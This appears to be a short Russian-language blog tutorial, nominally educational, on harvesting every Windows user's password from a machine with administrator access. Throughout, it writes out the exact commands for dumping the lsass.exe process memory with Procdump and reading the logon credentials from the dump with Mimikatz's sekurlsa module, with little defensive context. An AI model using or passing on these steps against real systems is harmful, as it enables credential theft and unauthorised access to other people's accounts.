Данная статья носит образовательный характер.
В системе Windows при желании можно успешно получить пароли всех пользователей. И если у вас есть доступ к системе с правами администратора, то это еще проще.
Изучим как раз момент, когда вы имеет доступ к компьютеру.
Итак поехали.
Во-первых нам нужно будет скачать определенный инструментарий.
Это официальная программа от Microsoft: Procdump
И также очень мощный инструмент для чтения дампа памяти: Mimikatz
Примечание: procdump и mimikatz поставляется в двух версиях, для x32 и x64.
Итак поехали:
Запустите в системе Windows командную строку (PowerShell или CMD) от имени администратора и далее перейдите в тот каталог, где находится программа Procdump, вы можете это выполнить с помощью команды:
pushd или cd
Когда вы окажетесь в каталоги с программой Procdump, выполните команду для записи дампа с процесса lsass.exe
Команда: procdump -ma lsass.exe lsassdump.dmp
Теперь нам нужно прочитать данный дамп, в котором как раз и содержатся все пароли, который есть в системе.
Для этого открываем программу Mimikatz (ту версию, которая у нас система, то есть если у нас 32 бита, то 32-битную версию, и наоборот если 64, то 64-битную версию).
В папку с программой mimikatz помещаем наш дамп lsassdump.dmp и далее выполняем следующую команду в оболочке mimikatz:
Первая команда: sekurlsa::Minidump lsassdump.dmp
Вторая команда: sekurlsa::logonPasswords
Данная статья показывает, что Windows система хранит свои пароли в специальном процессе в зашифрованном виде. Но сделаю примечание, что некоторые серверные системы Windows при специальном обновлении не хранят пароли в таком виде.
Надеюсь вам понравилась статья, подписывайтесь и ставьте лайки.